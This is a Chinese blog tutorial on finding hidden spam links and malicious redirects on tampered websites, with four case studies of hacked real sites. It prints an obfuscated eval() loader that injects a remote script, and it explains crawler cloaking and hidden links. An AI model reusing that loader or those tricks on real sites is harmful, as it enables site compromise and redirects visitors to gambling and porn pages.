首页 > 其他分享 >网站恶意篡改-黑链验证

网站恶意篡改-黑链验证

时间:2024-12-19 14:57:06浏览次数:6  
标签:PR 网站 黑链 js 篡改 恶意 com 页面

1|0 目录

  1. 网页介绍
  2. 页面篡改
  3. 验证黑链常用工具
  4. 查找黑链常用方法-实战案例

2|0 1.1 网页

网页由html+css+javascript组成,以人做举例,html描述了人有脸,有脖子,有身体,有四肢,css描述了每个部分如何链接,javascript决定了人的思想是什么样的。

2|11.1.1 Html

超文本标记语言 Hyper Text Markup Language,HTML 是用来描述网页的一种语言。只有html的页面是没有灵魂的人,不知道饿了该去吃饭,不知道见到人该去打招呼

【如果想简单学习玩耍请参考此链接:HTML 教程

2|21.1.2 Javascript

一种脚本语言,其源代码在发往客户端运行之前不需经过编译,而是将文本格式的字符代码发送给浏览器由浏览器解释运行。有了javascript(之后简称js)网页才能根据一些外界条件发生变化

【如果想简单学习玩耍请参考此链接:JavaScript 教程


3|0 1.2 页面篡改

网站页面内产生了网站所有者意想之外的变化,网站遭殃*_*

3|11.2.1 SEO

SEO全称为搜索引擎优化,是指通过站内优化、站外优化等方式,提升搜索引擎收录排名。搜索空气净化器,显示如下:

 

为什么显示顺序为京东->亚马逊->知乎,而不是其他顺序?

>>>首先引入概念PR值:

PR值全称为PageRank(网页级别),PR值是Google用于标识网页的等级、重要性、网站的好坏的重要标准之一。级别从0到10级为满分。PR值越高说明该网页越受欢迎。

例如:一个PR值为1的网站表明这个网站不太具有流行度,而PR值为7到10则表明这个网站非常受欢迎(或者说极其重要)。一般PR值达到4,就算是一个不错的网站了。Google把自己的网站的PR值定到9,这说明Google这个网站是非常受欢迎的,也可以说这个网站非常重要。

【PR查询页面:http://pr.chinaz.com

  PR高的网站不一定排名就好,但是大部分内页的排名都不错,PR高的网站分流到内页的权重比PR低的网站分配到内页的权重也高,排名相对也好,排名的计算方法很复杂,因此排名好的也不一定PR就高。

  既然有SEO技术,便会有相应的从业人员,他们被称为白帽SEO,专指通过公正SEO手法,帮助提升站点排名的专业人员。当然有白便会有黑,由于白帽SEO优化的过程将会十分漫长,一个新站想要获取好的排名,往往需要花上几年时间做优化推广。因此一些想要快速提升自身网站排名的小伙伴,便开始在SEO上研究作弊手法,从而诞生了黑帽SEO。黑帽SEO是指通过作弊手段,让站点快速提升排名的一类SEO技术,或者说是黑客技术,比如说:黑链(暗链)、站群、网站劫持(搜索引擎劫持)、桥页等,黑帽SEO能够快速提升排名,但毕竟是违规作弊行为


4|0 1.3 基础知识(以下内容使用浏览器都为火狐浏览器)

4|11.3.1 常用工具-源代码

常用快捷键:ctrl+u(也可以在页面前添加view-source:)

特点:只展示HTML代码,显示相关CSS和JS链接,但是并不加载

用途:粗略查看相关源代码

 

4|21.3.2 常用工具-审查元素-查看器

常用快捷键:F12(查看器标签)

特点:该页面会加载对应的js以及css,是一个更直观的输出展示页面

用途:详细查看相关源代码

 

4|31.3.3 常用工具-审查元素-控制台

用途:解密js进行快捷输出

加密js:

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('4.7(\'<0 c="1" 5="6/1" 3="8://9.a.b/2/d.2"></0>\');',14,14,'script|javascript|js|src|document|type|text|write|http|cq|355sf|com|language|bc'.split('|'),0,{}))

将eval函数去掉,直接复制黏贴进控制台就可以输出解密后的js

 

4|41.3.4 常用工具-审查元素-网络

用途:在不打开burp的前提下快速查看相关请求以及相应响应

 

4|51.3.5 常用工具-解密网站

推荐js界面网站:Javascript在线解压缩 - 在线工具

同1.3.3将js解密为:

 

4|61.3.6 常用工具-User-Agent Switcher

用途:修改HTTP请求头中的User Agent(之后统一简称UA)字段,该字段通常用来表示使用者身份,如:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0

  对于搜索引擎来说,为了区分自身和正常人的行为,爬虫会修改自己的UA为一个公共声明标识的UA如:360spider,这也为黑产对抗留下了入口,黑产从业者会通过js/后端php来进行请求头判断,如果是来自搜索引擎的流量,则展示黑产页面,如果是正常访客的UA则展示正常的页面。这样可以极大加强隐蔽自身的能力。

1.安装链接:https://addons.mozilla.org/firefox/downloads/file/1145502/user_agent_switcher-1.2.3-an+fx.xpi?src=search

2.安装后进入附加组件,找到该插件点击首选项进行配置

在google bot下面增加如下配置:

Baidu Bot [Bot]: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)

360 [Bot]: 360Spider

 

3.勾选任意一个,进行任意域名访问

请求头中User-Agent为对应勾选的User-Agent头即为配置成功

 

4|71.3.7 常用工具-referer control

用途:控制网站请求头中的Referer字段,该字段本身是用于记录当前网页的来源。

  通常来说搜索引擎的爬虫每次爬行都会将内容运回搜索引擎的数据库,所以通常爬虫对页面请求的上一跳中也一定会包含baidu/360/sougou/so/google等浏览器信息,

这又为黑产提供了隐藏自身行为的入口,通常也是通过js/php进行referer判断,如果包含搜索引擎相关字样则进行跳转到希望被引流的赌博页面,如果不包含则不跳转。

 


5|0 1.4 查找黑链常用方法

修改User-Agent头

修改referer

修改html代码中属性设置为隐藏的标签

5|1>>>篡改实战

5|21.4.1 篡改案例1

http://www.lcwsj.com/lcxinwen/2018041609219.html

首先我们打开审查元素-网络,打开这个网站,可以在下方的一系列跳转中看到网站跳转到了一个赌博网站:http://www.866bc.com:8080/,我们现在来分析整个跳转过程中到底发生了什么。

>>> 因为网站我们并不能看到上面URL的内容,首先在网络中找到对应这条请求

 

>>> 可以看到状态码是200,在HTTP状态码中只有3系列才可以执行跳转,那么问题应该出现在前端的js导致了异常跳转,这时候我们使用前面说到的查看源代码来防止js的加载,可以看到如下部分

 

>>> 这是一段做过混淆加密的js,我们将其放到控制台中进行解密获得如下内容

 

可以看到一个新的js:http://cq.355sf.com/js/bc.js

我们再次访问这个js可以看到如下部分:

 

Tips:hm.baidu.com和js.user.51.la都是网站流量统计工具,给网站站长进行流量分析的东西,可以忽略;

其他部分我们又看到了一个新的js: http://cq.355sf.com/js/tiao.js

我们又访问了这个js可以看到如下部分:

 

这又是一个加密混淆的js,我们依然使用之前的控制台进行解密

 

代码解读:

首先进行地点判断,如果属于北京、杭州、柬埔寨等地方,则展示一个404页面,如果不属于这些地方则判断当前页面有没有父页面(从a网站点击链接触发到这个js)如果存在父页面,则将父页面感染为http://m.22571777.com:8888/?a=69447,然后将打开页面展示为http://www.866bc.com:8080

5|31.4.2 篡改案例2

http://www.aswlw.org.cn/

这个网站并不像案例1中直接跳转到了赌博网站,这并不意味着这个网站没有发生篡改

查看源代码到最下面,可以看到

 

这种使用十六进制编码的形式写代码不是一般正常的写代码思路,这里其实就起了疑心,我们对其进行解码,使用工具网站:16进制到文本字符串的转换,16进制-BeJSON.com

 

可以看到是一些标签属性,里面看到关键字liblinlpa,再回看源代码,上方友情链接标签的id就是liblinlpa,又看到解密的内容中有display none的字样,故猜测这段加密代码的意义在于使上面被篡改的链接隐藏,防止被站长发现,进而被删除。进而我们尝试去访问上方的友情链接

 

可以看到含有专业性赌博词汇:pk10的专项词优化页面;

依次打开其他友情链接,也可以看到都和赌博有关

5|41.4.3 篡改案例3

http://www.drughk.com/cpzs.asp?upid=202&typeid=405&newsid=765

首先打开网站,我们初步审查源码可以看到基本上没有看起来不合理的地方

 

但是这里我们使用我们的user agent switcher 插件转换UA为360spider以后

源码中出现了

 

Display:none是一个黑产很常用的隐蔽手法,我们双击none改为true

回到html页面,可以看到原文中出现了如下内容

 

随便点击一个content内容可以看到基本上都是跳转到了不同的色情网站

5|51.4.4 篡改案例4

http://android.zgzg.org.cn/

1.首先访问页面:

 

2.通常这个页面为网站状态码为404以后展示的页面

但是仔细在网络中看一下响应包:

 

3.可以看到响应码是200

这就是一个非常不科学的事情,页面展示404页面,状态码却是200,这只能猜测404页面是人伪造的,其实这个页面是存在的,只是有人把内容伪装成了404页面的内容,所以成功响应,并显示404页面;

4.继续进入源码分析:

源码中涉及3个js,但是和为什么网站显示404页面,但是响应码为200都没什么关系。

这时候我们尝试改一下UA为360spider,发现网站显示到如下页面

 

那么网站是否产生了真实的篡改,初步判断是一定存在篡改

但是遍历页面每一个元素,没有找到真实被篡改的地方

 

5.这依然不意味着不存在篡改,我们进入审查元素-网络,选择第一个网站请求,查看响应标签中的响应载荷

可以看到响应载荷中的最下面存在大量色情专项优化词汇

 

这里我们可以确定网站一定是被篡改了

那么页面上这几千个敏感词到底在什么位置,我们看敏感词上面一行代码

 

6.Marquee是跑马灯,这里我们还看到了height=3,在html中3是一个非常小的值,我们重新看到原网页,翻到最下面,看到了一小排绿色的奇怪东西

 

鼠标努力勾选复制一下,找个地方黏贴出来,就能看到大量的敏感词了

5|61.4.5 最后

网站篡改技术和篡改对抗技术的更新速度是异常快的,举例子是举不完的,只能靠异于常人的细心和耐心抽丝剥茧来完成对抗

标签:PR,网站,黑链,js,篡改,恶意,com,页面
From: https://blog.csdn.net/2401_88756905/article/details/144569961

相关文章

  • 网站被修改能恢复吗,如何恢复被篡改的网站
    网站被修改后,可以通过以下步骤恢复到正常状态:备份当前文件:首先备份当前的网站文件,防止恢复过程中出现问题。查找备份文件:如果有定期备份的习惯,可以从备份文件中恢复。如果没有备份,可以联系托管商或云服务提供商,询问是否有自动备份。使用版本控制系统:如果使用Git......
  • 如何关闭Nginx的防恶意解析功能?
    关闭Nginx的防恶意解析功能非常简单,具体步骤如下:登录宝塔面板:打开浏览器,输入你的宝塔面板地址和端口,例如:http://你的服务器IP:8888,使用管理员账号和密码登录。进入环境设置:在左侧导航栏中,依次选择“环境设置”->“Nginx配置”。关闭防恶意解析功能:在Nginx配置......
  • 泷羽sec专题课笔记-- Windows作业--计算器 / 资源耗尽型恶意代码静态分析
    本笔记为泷羽sec《红队全栈课程》学习笔记,课程请可自行前往B站学习,课程/笔记主要涉及网络安全相关知识、系统以及工具的介绍等,请使用该课程、本笔记以及课程和笔记中提及工具的读者,遵守网络安全相关法律法规,切勿进行违法违规违纪的操作。写在最前面的话,我们为什么要学......
  • 网站index.php被恶意修改,恢复网站安全
    如果发现index.php文件被恶意修改,需要立即采取措施以确保网站的安全。以下是详细的步骤:备份当前文件:在进行任何操作前,备份当前的index.php文件。检查文件内容:使用代码编辑器打开index.php文件,检查是否有可疑的代码或内容。恶意代码通常包括隐藏的iframe、重定向脚本或其他不......
  • 虚拟机(VM)中毒排查涉及一系列步骤,目的是定位并清除虚拟机内可能存在的恶意软件或病毒。
    虚拟机(VM)中毒排查涉及一系列步骤,目的是定位并清除虚拟机内可能存在的恶意软件或病毒。虚拟机的安全性不仅需要保证虚拟机内部的操作系统和应用程序的安全,还需要考虑宿主机的安全,以及虚拟化平台的整体防护。以下是虚拟机中毒排查的常见步骤:1. 确认中毒的症状性能下降:虚拟机运行......
  • 举例说明恶意代码都有哪些?
    前端恶意代码的目标通常是窃取用户数据、劫持用户会话、篡改网页内容或进行其他恶意活动。以下是一些前端恶意代码的例子,并解释它们如何运作:1.跨站脚本攻击(XSS)原理:攻击者将恶意脚本注入到网站中,当用户访问该网站时,恶意脚本会在用户的浏览器中执行。例子:存储型XSS......
  • ROP(Return Oriented Programming) 是一种控制流劫持攻击技术,攻击者通过利用已存在的程
    ROP(ReturnOrientedProgramming)是一种控制流劫持攻击技术,攻击者通过利用已存在的程序代码片段(通常是函数中的一小段指令),将这些片段连接起来,从而构造出恶意的控制流,绕过传统的防御机制如数据执行保护(DEP)或非可执行栈(NX)。ROP攻击通常与缓冲区溢出攻击结合使用,目的是执行攻击者......
  • 数据执行保护(DEP,Data Execution Prevention) 是一种安全机制,旨在防止恶意代码在计算机
    数据执行保护(DEP,DataExecutionPrevention)是一种安全机制,旨在防止恶意代码在计算机的特定内存区域执行。它通过标记某些内存区域为“不可执行”,从而阻止攻击者在这些区域注入并执行恶意代码。DEP的工作原理DEP的基本思想是,操作系统通过对内存区域的权限控制,防止程序在某些特......
  • 红队/白帽必经之路(18)——如何用Metasploit 制作Windows恶意木马病毒/软件获取shell[
    上节回顾目录上节回顾1.模拟黑客给真正的快播软件加上后门先下载一个正常的快播软件可以下载绿色版本,免安装的快播软件上传到QvodTerminal.exe到kali上对QvodTerminal.exe注入payload后门程序使用绑定了后门的QvodTerminal.exe替换原来的QvodTerminal.e......
  • LOLBAS(Living Off the Land Binaries and Scripts)是指一种网络攻击技术,攻击者利用目标
    LOLBAS的英文全称是LivingOfftheLandBinariesandScripts。它指的是攻击者利用目标环境中已存在的合法二进制文件、脚本或工具来执行恶意活动的一系列技术和战术。这种方法通过使用操作系统或其软件中常见的工具和资源,避免了引入外部恶意软件或可疑的可执行文件,从而帮助攻......